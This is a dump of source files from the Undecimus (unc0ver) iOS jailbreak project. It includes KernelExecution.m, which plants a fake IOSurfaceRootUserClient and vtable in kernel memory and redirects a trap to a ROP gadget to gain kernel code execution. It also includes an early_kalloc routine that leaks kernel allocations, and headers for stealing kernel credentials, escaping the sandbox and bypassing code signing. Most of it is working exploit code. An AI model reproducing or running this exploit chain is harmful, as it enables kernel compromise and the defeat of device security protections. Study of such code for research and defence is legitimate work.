16 | NSArray *resolveDepsForPkg(NSString * _Nonnull pkg, BOOL noPreDeps);
17 | BOOL extractDebsForPkg(NSString *pkg, NSMutableArray *installed, BOOL preDeps, bool doInject);
18 | NSDictionary *getPkgs(void);
19 | NSString *debForPkg(NSString *pkg);
20 | NSArray *debsForPkgs(NSArray *pkgs);
21 |
22 | #endif /* FakeApt_h */
23 |
--------------------------------------------------------------------------------
/Undecimus/source/KernelExecution.h:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | bool init_kexec(void);
5 | void term_kexec(void);
6 | kptr_t kexec(kptr_t ptr, kptr_t x0, kptr_t x1, kptr_t x2, kptr_t x3, kptr_t x4, kptr_t x5, kptr_t x6);
7 |
--------------------------------------------------------------------------------
/Undecimus/source/KernelExecution.m:
--------------------------------------------------------------------------------
1 | #include "KernelExecution.h"
2 | #include "KernelMemory.h"
3 | #include "KernelOffsets.h"
4 | #include "KernelUtilities.h"
5 | #include "find_port.h"
6 | #include "kernel_call.h"
7 | #include
8 | #include
9 | #include
10 | #import
11 | #include "parameters.h"
12 | #include "kc_parameters.h"
13 | #include "kernel_memory.h"
14 |
15 | #if !__arm64e__
16 | static mach_port_t prepare_user_client()
17 | {
18 | kern_return_t err;
19 | mach_port_t user_client;
20 | io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"));
21 |
22 | if (service == IO_OBJECT_NULL) {
23 | LOG("unable to find service");
24 | exit(EXIT_FAILURE);
25 | }
26 |
27 | err = IOServiceOpen(service, mach_task_self(), 0, &user_client);
28 | if (err != KERN_SUCCESS) {
29 | LOG("unable to get user client connection");
30 | exit(EXIT_FAILURE);
31 | }
32 |
33 | return user_client;
34 | }
35 |
36 | static mach_port_t user_client;
37 | static kptr_t IOSurfaceRootUserClient_port;
38 | static kptr_t IOSurfaceRootUserClient_addr;
39 | static kptr_t fake_vtable;
40 | static kptr_t fake_client;
41 | static const int fake_kalloc_size = 0x1000;
42 | #endif
43 | static pthread_mutex_t kexec_lock;
44 |
45 | bool init_kexec()
46 | {
47 | #if __arm64e__
48 | if (!parameters_init()) return false;
49 | kernel_task_port = tfp0;
50 | if (!MACH_PORT_VALID(kernel_task_port)) return false;
51 | current_task = ReadKernel64(task_self_addr() + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
52 | if (!KERN_POINTER_VALID(current_task)) return false;
53 | kernel_task = ReadKernel64(getoffset(kernel_task));
54 | if (!KERN_POINTER_VALID(kernel_task)) return false;
55 | if (!kernel_call_init()) return false;
56 | #else
57 | user_client = prepare_user_client();
58 | if (!MACH_PORT_VALID(user_client)) return false;
59 |
60 | // From v0rtex - get the IOSurfaceRootUserClient port, and then the address of the actual client, and vtable
61 | IOSurfaceRootUserClient_port = get_address_of_port(proc_struct_addr(), user_client); // UserClients are just mach_ports, so we find its address
62 | if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_port)) return false;
63 |
64 | IOSurfaceRootUserClient_addr = ReadKernel64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); // The UserClient itself (the C++ object) is at the kobject field
65 | if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_addr)) return false;
66 |
67 | kptr_t IOSurfaceRootUserClient_vtab = ReadKernel64(IOSurfaceRootUserClient_addr); // vtables in C++ are at *object
68 | if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_vtab)) return false;
69 |
70 | // The aim is to create a fake client, with a fake vtable, and overwrite the existing client with the fake one
71 | // Once we do that, we can use IOConnectTrap6 to call functions in the kernel as the kernel
72 |
73 | // Create the vtable in the kernel memory, then copy the existing vtable into there
74 | fake_vtable = kmem_alloc(fake_kalloc_size);
75 | if (!KERN_POINTER_VALID(fake_vtable)) return false;
76 |
77 | for (int i = 0; i < 0x200; i++) {
78 | WriteKernel64(fake_vtable + i * 8, ReadKernel64(IOSurfaceRootUserClient_vtab + i * 8));
79 | }
80 |
81 | // Create the fake user client
82 | fake_client = kmem_alloc(fake_kalloc_size);
83 | if (!KERN_POINTER_VALID(fake_client)) return false;
84 |
85 | for (int i = 0; i < 0x200; i++) {
86 | WriteKernel64(fake_client + i * 8, ReadKernel64(IOSurfaceRootUserClient_addr + i * 8));
87 | }
88 |
89 | // Write our fake vtable into the fake user client
90 | WriteKernel64(fake_client, fake_vtable);
91 |
92 | // Replace the user client with ours
93 | WriteKernel64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), fake_client);
94 |
95 | // Now the userclient port we have will look into our fake user client rather than the old one
96 |
97 | // Replace IOUserClient::getExternalTrapForIndex with our ROP gadget (add x0, x0, #0x40; ret;)
98 | WriteKernel64(fake_vtable + 8 * 0xB7, getoffset(add_x0_x0_0x40_ret));
99 |
100 | #endif
101 | pthread_mutex_init(&kexec_lock, NULL);
102 | return true;
103 | }
104 |
105 | void term_kexec()
106 | {
107 | #if __arm64e__
108 | kernel_call_deinit();
109 | #else
110 | WriteKernel64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), IOSurfaceRootUserClient_addr);
111 | kmem_free(fake_vtable, fake_kalloc_size);
112 | kmem_free(fake_client, fake_kalloc_size);
113 | IOServiceClose(user_client);
114 | #endif
115 | pthread_mutex_destroy(&kexec_lock);
116 | }
117 |
118 | kptr_t kexec(kptr_t ptr, kptr_t x0, kptr_t x1, kptr_t x2, kptr_t x3, kptr_t x4, kptr_t x5, kptr_t x6)
119 | {
120 | kptr_t returnval = 0;
121 | pthread_mutex_lock(&kexec_lock);
122 | #if __arm64e__
123 | returnval = kernel_call_7(ptr, 7, x0, x1, x2, x3, x4, x5, x6);
124 | #else
125 | // When calling IOConnectTrapX, this makes a call to iokit_user_client_trap, which is the user->kernel call (MIG). This then calls IOUserClient::getTargetAndTrapForIndex
126 | // to get the trap struct (which contains an object and the function pointer itself). This function calls IOUserClient::getExternalTrapForIndex, which is expected to return a trap.
127 | // This jumps to our gadget, which returns +0x40 into our fake user_client, which we can modify. The function is then called on the object. But how C++ actually works is that the
128 | // function is called with the first arguement being the object (referenced as `this`). Because of that, the first argument of any function we call is the object, and everything else is passed
129 | // through like normal.
130 |
131 | // Because the gadget gets the trap at user_client+0x40, we have to overwrite the contents of it
132 | // We will pull a switch when doing so - retrieve the current contents, call the trap, put back the contents
133 | // (i'm not actually sure if the switch back is necessary but meh)
134 |
135 | kptr_t offx20 = ReadKernel64(fake_client + 0x40);
136 | kptr_t offx28 = ReadKernel64(fake_client + 0x48);
137 | WriteKernel64(fake_client + 0x40, x0);
138 | WriteKernel64(fake_client + 0x48, ptr);
139 | returnval = IOConnectTrap6(user_client, 0, x1, x2, x3, x4, x5, x6);
140 | WriteKernel64(fake_client + 0x40, offx20);
141 | WriteKernel64(fake_client + 0x48, offx28);
142 | #endif
143 | pthread_mutex_unlock(&kexec_lock);
144 | return returnval;
145 | }
146 |
--------------------------------------------------------------------------------
/Undecimus/source/KernelMemory.h:
--------------------------------------------------------------------------------
1 | #ifndef KernelMemory_h
2 | #define KernelMemory_h
3 |
4 | #include
5 | #include
6 | #include
7 |
8 | /***** mach_vm.h *****/
9 | kern_return_t mach_vm_read(
10 | vm_map_t target_task,
11 | mach_vm_address_t address,
12 | mach_vm_size_t size,
13 | vm_offset_t* data,
14 | mach_msg_type_number_t* dataCnt);
15 |
16 | kern_return_t mach_vm_write(
17 | vm_map_t target_task,
18 | mach_vm_address_t address,
19 | vm_offset_t data,
20 | mach_msg_type_number_t dataCnt);
21 |
22 | kern_return_t mach_vm_read_overwrite(
23 | vm_map_t target_task,
24 | mach_vm_address_t address,
25 | mach_vm_size_t size,
26 | mach_vm_address_t data,
27 | mach_vm_size_t* outsize);
28 |
29 | kern_return_t mach_vm_allocate(
30 | vm_map_t target,
31 | mach_vm_address_t* address,
32 | mach_vm_size_t size,
33 | int flags);
34 |
35 | kern_return_t mach_vm_deallocate(
36 | vm_map_t target,
37 | mach_vm_address_t address,
38 | mach_vm_size_t size);
39 |
40 | kern_return_t mach_vm_protect(
41 | vm_map_t target_task,
42 | mach_vm_address_t address,
43 | mach_vm_size_t size,
44 | boolean_t set_maximum,
45 | vm_prot_t new_protection);
46 |
47 | kern_return_t mach_vm_remap(
48 | mach_port_name_t target,
49 | mach_vm_address_t *address,
50 | mach_vm_size_t size,
51 | mach_vm_offset_t mask,
52 | int flags,
53 | mach_port_name_t src_task,
54 | mach_vm_address_t src_address,
55 | boolean_t copy,
56 | vm_prot_t *cur_protection,
57 | vm_prot_t *max_protection,
58 | vm_inherit_t inheritance);
59 |
60 | extern size_t kreads;
61 | extern size_t kwrites;
62 | extern mach_port_t tfp0;
63 |
64 | size_t kread(kptr_t where, void* p, size_t size);
65 | size_t kwrite(kptr_t where, const void* p, size_t size);
66 |
67 | #define rk32(kaddr) ReadKernel32(kaddr)
68 | #define rk64(kaddr) ReadKernel64(kaddr)
69 | uint32_t ReadKernel32(kptr_t kaddr);
70 | uint64_t ReadKernel64(kptr_t kaddr);
71 |
72 | #define wk32(kaddr, val) WriteKernel32(kaddr, val)
73 | #define wk64(kaddr, val) WriteKernel64(kaddr, val)
74 | bool WriteKernel32(kptr_t kaddr, uint32_t val);
75 | bool WriteKernel64(kptr_t kaddr, uint64_t val);
76 |
77 | bool wkbuffer(kptr_t kaddr, void* buffer, size_t length);
78 | bool rkbuffer(kptr_t kaddr, void* buffer, size_t length);
79 |
80 | void kmemcpy(uint64_t dest, uint64_t src, uint32_t length);
81 |
82 | bool kmem_protect(kptr_t kaddr, uint32_t size, vm_prot_t prot);
83 |
84 | kptr_t kmem_alloc(uint64_t size);
85 | kptr_t kmem_alloc_wired(uint64_t size);
86 | bool kmem_free(kptr_t kaddr, uint64_t size);
87 |
88 | void prepare_rk_via_kmem_read_port(mach_port_t port);
89 | void prepare_rwk_via_tfp0(mach_port_t port);
90 | void prepare_for_rw_with_fake_tfp0(mach_port_t fake_tfp0);
91 |
92 | // query whether kmem read or write is present
93 | bool have_kmem_read(void);
94 | bool have_kmem_write(void);
95 |
96 | #endif
97 |
--------------------------------------------------------------------------------
/Undecimus/source/KernelOffsets.h:
--------------------------------------------------------------------------------
1 | #ifndef KernelOffsets_h
2 | #define KernelOffsets_h
3 |
4 | extern uint32_t* offsets;
5 |
6 | enum kernel_offset {
7 | /* struct task */
8 | KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
9 | KSTRUCT_OFFSET_TASK_REF_COUNT,
10 | KSTRUCT_OFFSET_TASK_ACTIVE,
11 | KSTRUCT_OFFSET_TASK_VM_MAP,
12 | KSTRUCT_OFFSET_TASK_NEXT,
13 | KSTRUCT_OFFSET_TASK_PREV,
14 | KSTRUCT_OFFSET_TASK_ITK_SPACE,
15 | KSTRUCT_OFFSET_TASK_BSD_INFO,
16 | KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_ADDR,
17 | KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_SIZE,
18 | KSTRUCT_OFFSET_TASK_TFLAGS,
19 | KSTRUCT_OFFSET_TASK_LOCK,
20 |
21 | /* struct ipc_port */
22 | KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
23 | KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
24 | KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
25 | KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
26 | KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
27 | KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
28 | KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
29 | KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
30 | KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
31 |
32 | /* struct proc */
33 | KSTRUCT_OFFSET_PROC_PID,
34 | KSTRUCT_OFFSET_PROC_P_FD,
35 | KSTRUCT_OFFSET_PROC_TASK,
36 | KSTRUCT_OFFSET_PROC_UCRED,
37 | KSTRUCT_OFFSET_PROC_P_LIST,
38 | KSTRUCT_OFFSET_PROC_P_CSFLAGS,
39 | KSTRUCT_OFFSET_PROC_P_MEMSTAT_STATE,
40 | KSTRUCT_OFFSET_PROC_MLOCK,
41 | KSTRUCT_OFFSET_PROC_UCRED_MLOCK,
42 | KSTRUCT_OFFSET_PROC_SVUID,
43 | KSTRUCT_OFFSET_PROC_SVGID,
44 |
45 | /* struct filedesc */
46 | KSTRUCT_OFFSET_FILEDESC_FD_OFILES,
47 |
48 | /* struct fileproc */
49 | KSTRUCT_OFFSET_FILEPROC_F_FGLOB,
50 |
51 | /* struct fileglob */
52 | KSTRUCT_OFFSET_FILEGLOB_FG_DATA,
53 |
54 | /* struct socket */
55 | KSTRUCT_OFFSET_SOCKET_SO_PCB,
56 |
57 | /* struct pipe */
58 | KSTRUCT_OFFSET_PIPE_BUFFER,
59 |
60 | /* struct ipc_space */
61 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE,
62 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE,
63 |
64 | /* struct vnode */
65 | KSTRUCT_OFFSET_VNODE_V_MOUNT,
66 | KSTRUCT_OFFSET_VNODE_VU_SPECINFO,
67 | KSTRUCT_OFFSET_VNODE_V_LOCK,
68 | KSTRUCT_OFFSET_VNODE_V_DATA,
69 |
70 | /* struct specinfo */
71 | KSTRUCT_OFFSET_SPECINFO_SI_FLAGS,
72 |
73 | /* struct mount */
74 | KSTRUCT_OFFSET_MOUNT_MNT_FLAG,
75 | KSTRUCT_OFFSET_MOUNT_MNT_DATA,
76 | KSTRUCT_OFFSET_MOUNT_MNT_MLOCK,
77 |
78 | /* struct host */
79 | KSTRUCT_OFFSET_HOST_SPECIAL,
80 |
81 | /* struct ucred */
82 | KSTRUCT_OFFSET_UCRED_CR_REF,
83 | KSTRUCT_OFFSET_UCRED_CR_UID,
84 | KSTRUCT_OFFSET_UCRED_CR_RUID,
85 | KSTRUCT_OFFSET_UCRED_CR_SVUID,
86 | KSTRUCT_OFFSET_UCRED_CR_NGROUPS,
87 | KSTRUCT_OFFSET_UCRED_CR_GROUPS,
88 | KSTRUCT_OFFSET_UCRED_CR_RGID,
89 | KSTRUCT_OFFSET_UCRED_CR_SVGID,
90 | KSTRUCT_OFFSET_UCRED_CR_GMUID,
91 | KSTRUCT_OFFSET_UCRED_CR_FLAGS,
92 | KSTRUCT_OFFSET_UCRED_CR_LABEL,
93 |
94 | /* struct label */
95 | KSTRUCT_OFFSET_LABEL_L_FLAGS,
96 | KSTRUCT_OFFSET_LABEL_L_PERPOLICY,
97 |
98 | /* struct ipc_entry */
99 | KSTRUCT_SIZE_IPC_ENTRY,
100 | KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS,
101 |
102 | /* struct vnode */
103 | KSTRUCT_OFFSET_VNODE_V_FLAG,
104 |
105 | /* vtable OSDictionary */
106 | KVTABLE_OFFSET_OSDICTIONARY_SETOBJECTWITHCHARP,
107 | KVTABLE_OFFSET_OSDICTIONARY_GETOBJECTWITHCHARP,
108 | KVTABLE_OFFSET_OSDICTIONARY_MERGE,
109 |
110 | /* vtable OSArray */
111 | KVTABLE_OFFSET_OSARRAY_MERGE,
112 | KVTABLE_OFFSET_OSARRAY_REMOVEOBJECT,
113 | KVTABLE_OFFSET_OSARRAY_GETOBJECT,
114 |
115 | /* vtable OSObject */
116 | KVTABLE_OFFSET_OSOBJECT_RELEASE,
117 | KVTABLE_OFFSET_OSOBJECT_GETRETAINCOUNT,
118 | KVTABLE_OFFSET_OSOBJECT_RETAIN,
119 |
120 | /* vtable OSString */
121 | KVTABLE_OFFSET_OSSTRING_GETLENGTH,
122 |
123 | KFREE_ADDR_OFFSET,
124 | };
125 |
126 | uint32_t koffset(enum kernel_offset offset);
127 |
128 | #endif
129 |
--------------------------------------------------------------------------------
/Undecimus/source/KernelUtilities.h:
--------------------------------------------------------------------------------
1 | #ifndef kutils_h
2 | #define kutils_h
3 |
4 | #include
5 | #include
6 | #include
7 | #include
8 |
9 | #if 0
10 | Credits:
11 | - https://stek29.rocks/2018/01/26/sandbox.html
12 | - https://stek29.rocks/2018/12/11/shenanigans.html
13 | - http://newosxbook.com/QiLin/qilin.pdf
14 | - https://github.com/Siguza/v0rtex/blob/e6d54c97715d6dbcdda8b9a8090484a7a47019d0/src/v0rtex.m#L1623
15 | #endif
16 |
17 | #if 0
18 | TODO:
19 | - Patchfind proc_lock (High priority)
20 | - Patchfind proc_unlock (High priority)
21 | - Patchfind proc_ucred_lock (High priority)
22 | - Patchfind proc_ucred_unlock (High priority)
23 | - Patchfind vnode_lock (Low priority)
24 | - Patchfind vnode_unlock (Low priority)
25 | - Patchfind mount_lock (Low priority)
26 | - Patchfind mount_unlock (Low priority)
27 | - Patchfind task_set_platform_binary (High priority)
28 | - Patchfind kauth_cred_ref (Low priority)
29 | - Patchfind kauth_cred_unref (Low priority)
30 | - Patchfind chgproccnt (Low priority)
31 | - Patchfind kauth_cred_ref (Low priority)
32 | - Patchfind kauth_cred_unref (Low priority)
33 | - Patchfind extension_destroy (Low priority)
34 | - Patchfind extension_create_mach (Middle priority)
35 | - Use offsetof with XNU headers to find structure offsets (Low priority)
36 | - Update Unrestrict to implement the kernel calls
37 | #endif
38 |
39 | #define setoffset(offset, val) set_offset(#offset, val)
40 | #define getoffset(offset) get_offset(#offset)
41 |
42 | #define OSBoolTrue getOSBool(true)
43 | #define OSBoolFalse getOSBool(false)
44 |
45 | extern kptr_t kernel_base;
46 | extern uint64_t kernel_slide;
47 |
48 | extern kptr_t cached_proc_struct_addr;
49 | extern kptr_t cached_task_self_addr;
50 | extern bool found_offsets;
51 |
52 | kptr_t task_self_addr(void);
53 | kptr_t ipc_space_kernel(void);
54 | kptr_t find_kernel_base(void);
55 |
56 | kptr_t current_thread(void);
57 |
58 | mach_port_t fake_host_priv(void);
59 |
60 | int message_size_for_kalloc_size(int kalloc_size);
61 |
62 | kptr_t get_kernel_proc_struct_addr(void);
63 | bool iterate_proc_list(void (^handler)(kptr_t, pid_t, bool *));
64 | kptr_t get_proc_struct_for_pid(pid_t pid);
65 | kptr_t proc_struct_addr(void);
66 | kptr_t get_address_of_port(kptr_t proc, mach_port_t port);
67 | kptr_t get_kernel_cred_addr(void);
68 | kptr_t give_creds_to_process_at_addr(kptr_t proc, kptr_t cred_addr);
69 | bool set_platform_binary(kptr_t proc, bool set);
70 |
71 | kptr_t zm_fix_addr(kptr_t addr);
72 |
73 | bool verify_tfp0(void);
74 |
75 | extern int (*pmap_load_trust_cache)(kptr_t kernel_trust, size_t length);
76 | int _pmap_load_trust_cache(kptr_t kernel_trust, size_t length);
77 |
78 | bool set_host_type(host_t host, uint32_t type);
79 | bool export_tfp0(host_t host);
80 | bool unexport_tfp0(host_t host);
81 |
82 | bool set_csflags(kptr_t proc, uint32_t flags, bool value);
83 | bool set_cs_platform_binary(kptr_t proc, bool value);
84 |
85 | bool execute_with_credentials(kptr_t proc, kptr_t credentials, void (^function)(void));
86 |
87 | uint32_t get_proc_memstat_state(kptr_t proc);
88 | bool set_proc_memstat_state(kptr_t proc, uint32_t memstat_state);
89 | bool set_proc_memstat_internal(kptr_t proc, bool set);
90 | bool get_proc_memstat_internal(kptr_t proc);
91 | size_t kstrlen(kptr_t ptr);
92 | kptr_t sstrdup(const char *str);
93 | kptr_t smalloc(size_t size);
94 | void sfree(kptr_t ptr);
95 | kptr_t IOMalloc(vm_size_t size);
96 | void IOFree(kptr_t address, vm_size_t size);
97 | int extension_create_file(kptr_t saveto, kptr_t sb, const char *path, size_t path_len, uint32_t subtype);
98 | int extension_create_mach(kptr_t saveto, kptr_t sb, const char *name, uint32_t subtype);
99 | int extension_add(kptr_t ext, kptr_t sb, const char *desc);
100 | void extension_release(kptr_t ext);
101 | void extension_destroy(kptr_t ext);
102 | bool set_file_extension(kptr_t sandbox, const char *exc_key, const char *path);
103 | bool set_mach_extension(kptr_t sandbox, const char *exc_key, const char *name);
104 | kptr_t proc_find(pid_t pid);
105 | void proc_rele(kptr_t proc);
106 | void proc_lock(kptr_t proc);
107 | void proc_unlock(kptr_t proc);
108 | void proc_ucred_lock(kptr_t proc);
109 | void proc_ucred_unlock(kptr_t proc);
110 | void vnode_lock(kptr_t vp);
111 | void vnode_unlock(kptr_t vp);
112 | void mount_lock(kptr_t mp);
113 | void mount_unlock(kptr_t mp);
114 | void task_set_platform_binary(kptr_t task, boolean_t is_platform);
115 | void kauth_cred_ref(kptr_t cred);
116 | void kauth_cred_unref(kptr_t cred);
117 | int chgproccnt(uid_t uid, int diff);
118 | kptr_t vfs_context_current(void);
119 | int vnode_lookup(const char *path, int flags, kptr_t *vpp, kptr_t ctx);
120 | int vnode_getfromfd(kptr_t ctx, int fd, kptr_t *vpp);
121 | int vn_getpath(kptr_t vp, char *pathbuf, int *len);
122 | int vnode_put(kptr_t vp);
123 | bool OSDictionary_SetItem(kptr_t OSDictionary, const char *key, kptr_t val);
124 | kptr_t OSDictionary_GetItem(kptr_t OSDictionary, const char *key);
125 | bool OSDictionary_Merge(kptr_t OSDictionary, kptr_t OSDictionary2);
126 | uint32_t OSDictionary_ItemCount(kptr_t OSDictionary);
127 | kptr_t OSDictionary_ItemBuffer(kptr_t OSDictionary);
128 | kptr_t OSDictionary_ItemKey(kptr_t buffer, uint32_t idx);
129 | kptr_t OSDictionary_ItemValue(kptr_t buffer, uint32_t idx);
130 | uint32_t OSArray_ItemCount(kptr_t OSArray);
131 | bool OSArray_Merge(kptr_t OSArray, kptr_t OSArray2);
132 | kptr_t OSArray_GetObject(kptr_t OSArray, uint32_t idx);
133 | void OSArray_RemoveObject(kptr_t OSArray, uint32_t idx);
134 | kptr_t OSArray_ItemBuffer(kptr_t OSArray);
135 | kptr_t OSObjectFunc(kptr_t OSObject, uint32_t off);
136 | void OSObject_Release(kptr_t OSObject);
137 | void OSObject_Retain(kptr_t OSObject);
138 | uint32_t OSObject_GetRetainCount(kptr_t OSObject);
139 | uint32_t OSString_GetLength(kptr_t OSString);
140 | kptr_t OSString_CStringPtr(kptr_t OSString);
141 | char *OSString_CopyString(kptr_t OSString);
142 | kptr_t OSUnserializeXML(const char *buffer);
143 | kptr_t get_exception_osarray(const char **exceptions, bool is_file_extension);
144 | char **copy_amfi_entitlements(kptr_t present);
145 | kptr_t getOSBool(bool value);
146 | bool entitle_process(kptr_t amfi_entitlements, const char *key, kptr_t val);
147 | bool set_sandbox_exceptions(kptr_t sandbox);
148 | bool check_for_exception(char **current_exceptions, const char *exception);
149 | bool set_amfi_exceptions(kptr_t amfi_entitlements, const char *exc_key, const char **exceptions, bool is_file_extension);
150 | bool set_exceptions(kptr_t sandbox, kptr_t amfi_entitlements);
151 | kptr_t get_amfi_entitlements(kptr_t cr_label);
152 | kptr_t get_sandbox(kptr_t cr_label);
153 | bool entitle_process_with_pid(pid_t pid, const char *key, kptr_t val);
154 | bool remove_memory_limit(void);
155 | bool restore_kernel_task_port(task_t *out_kernel_task_port);
156 | bool restore_kernel_base(uint64_t *out_kernel_base, uint64_t *out_kernel_slide);
157 | bool restore_kernel_offset_cache(void);
158 | bool restore_file_offset_cache(const char *offset_cache_file_path, kptr_t *out_kernel_base, uint64_t *out_kernel_slide);
159 | bool convert_port_to_task_port(mach_port_t port, kptr_t space, kptr_t task_kaddr);
160 | kptr_t make_fake_task(kptr_t vm_map);
161 | bool make_port_fake_task_port(mach_port_t port, kptr_t task_kaddr);
162 | bool set_hsp4(task_t port);
163 | kptr_t get_vnode_for_path(const char *path);
164 | kptr_t get_vnode_for_fd(int fd);
165 | char *get_path_for_fd(int fd);
166 | kptr_t get_vnode_for_snapshot(int fd, char *name);
167 | bool set_kernel_task_info(void);
168 | int issue_extension_for_mach_service(kptr_t sb, kptr_t ctx, const char *entry_name, void *desc);
169 | bool unrestrict_process(pid_t pid);
170 | bool unrestrict_process_with_task_port(task_t task_port);
171 | bool unrestrict_library(const char *path);
172 | bool unrestrict_library_with_fd(int fd);
173 | bool revalidate_process(pid_t pid);
174 | bool revalidate_process_with_task_port(task_t task_port);
175 | bool enable_mapping_for_library(const char *lib);
176 | bool enable_mapping_for_libraries(const char *libs);
177 | kptr_t find_vnode_with_fd(kptr_t proc, int fd);
178 | kptr_t find_vnode_with_path(const char *path);
179 | kptr_t swap_sandbox_for_proc(kptr_t proc, kptr_t sandbox);
180 |
181 | #endif /* kutils_h */
182 |
--------------------------------------------------------------------------------
/Undecimus/source/async_wake.h:
--------------------------------------------------------------------------------
1 | #ifndef async_wake_h
2 | #define async_wake_h
3 |
4 | #include
5 |
6 | bool async_wake_go(void);
7 |
8 | #endif /* async_wake_h */
9 |
--------------------------------------------------------------------------------
/Undecimus/source/diagnostics.h:
--------------------------------------------------------------------------------
1 | //
2 | // diagnostics.h
3 | // Undecimus
4 | //
5 | // Created by Pwn20wnd on 5/3/19.
6 | // Copyright © 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #ifndef diagnostics_h
10 | #define diagnostics_h
11 |
12 | #include
13 |
14 | #define STATUS_FILE @"/var/lib/dpkg/status"
15 | #define CYDIA_LIST @"/etc/apt/cydiasources.d/cydia.list"
16 | //#define SILEO_LIST @"/etc/apt/sources.list.d/sileo.sources"
17 |
18 | NSArray *dependencyArrayFromString(NSString *depends);
19 | NSArray *parsedPackageArray(void);
20 | NSString *domainFromRepoObject(NSString *repoObject);
21 | NSArray *sourcesFromFile(NSString *theSourceFile);
22 | NSDictionary *getDiagnostics(void);
23 |
24 | #endif /* diagnostics_h */
25 |
--------------------------------------------------------------------------------
/Undecimus/source/early_kalloc.c:
--------------------------------------------------------------------------------
1 | //
2 | // early_kalloc.c
3 | // async_wake_ios
4 | //
5 | // Created by Ian Beer on 12/11/17.
6 | // Copyright © 2017 Ian Beer. All rights reserved.
7 | //
8 |
9 | #include "early_kalloc.h"
10 |
11 | #include
12 | #include
13 | #include
14 |
15 | #include "KernelMemory.h"
16 | #include "KernelOffsets.h"
17 | #include "KernelUtilities.h"
18 | #include "find_port.h"
19 | #include
20 |
21 | // get a kalloc allocation before we've got a kcall interface to just call it
22 | uint64_t early_kalloc(int size)
23 | {
24 | mach_port_t port = MACH_PORT_NULL;
25 | kern_return_t err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
26 | if (err != KERN_SUCCESS) {
27 | LOG("unable to allocate port");
28 | }
29 |
30 | uint64_t port_kaddr = find_port_address(port, MACH_MSG_TYPE_MAKE_SEND);
31 |
32 | struct simple_msg {
33 | mach_msg_header_t hdr;
34 | char buf[0];
35 | };
36 |
37 | mach_msg_size_t msg_size = message_size_for_kalloc_size(size);
38 | struct simple_msg* msg = malloc(msg_size);
39 | memset(msg, 0, msg_size);
40 |
41 | msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
42 | msg->hdr.msgh_size = msg_size;
43 | msg->hdr.msgh_remote_port = port;
44 | msg->hdr.msgh_local_port = MACH_PORT_NULL;
45 | msg->hdr.msgh_id = 0x41414142;
46 |
47 | err = mach_msg(&msg->hdr,
48 | MACH_SEND_MSG | MACH_MSG_OPTION_NONE,
49 | msg_size,
50 | 0,
51 | MACH_PORT_NULL,
52 | MACH_MSG_TIMEOUT_NONE,
53 | MACH_PORT_NULL);
54 |
55 | if (err != KERN_SUCCESS) {
56 | LOG("early kalloc failed to send message");
57 | }
58 |
59 | // find the message buffer:
60 |
61 | uint64_t message_buffer = ReadKernel64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE));
62 | LOG("message buffer: %llx", message_buffer);
63 |
64 | // leak the message buffer:
65 | WriteKernel64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE), 0);
66 | WriteKernel32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT), 0x50000); // this is two uint16_ts, msg_count and qlimit
67 |
68 | return message_buffer;
69 | }
70 |
--------------------------------------------------------------------------------
/Undecimus/source/early_kalloc.h:
--------------------------------------------------------------------------------
1 | #ifndef early_kalloc_h
2 | #define early_kalloc_h
3 |
4 | #include
5 |
6 | uint64_t early_kalloc(int size);
7 |
8 | #endif
9 |
--------------------------------------------------------------------------------
/Undecimus/source/find_port.h:
--------------------------------------------------------------------------------
1 | #ifndef find_port_h
2 | #define find_port_h
3 |
4 | #include
5 |
6 | uint64_t find_port_address(mach_port_t port, int disposition);
7 |
8 | #endif /* find_port_h */
9 |
--------------------------------------------------------------------------------
/Undecimus/source/hideventsystem.h:
--------------------------------------------------------------------------------
1 | #ifndef hideventsystem_h
2 | #define hideventsystem_h
3 |
4 | #include
5 |
6 | // get a thread port from backboardd
7 | mach_port_t hid_event_queue_exploit(void);
8 |
9 | #endif /* hideventsystem_h */
10 |
--------------------------------------------------------------------------------
/Undecimus/source/jailbreak.h:
--------------------------------------------------------------------------------
1 | //
2 | // jailbreak.h
3 | // Undecimus
4 | //
5 | // Created by Pwn20wnd on 5/11/19.
6 | // Copyright © 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #ifndef jailbreak_h
10 | #define jailbreak_h
11 |
12 | #include
13 |
14 | void jailbreak(void);
15 |
16 | #endif /* jailbreak_h */
17 |
--------------------------------------------------------------------------------
/Undecimus/source/jailbreak.m:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/source/jailbreak.m
--------------------------------------------------------------------------------
/Undecimus/source/kalloc_crash.c:
--------------------------------------------------------------------------------
1 | //
2 | // panic.c
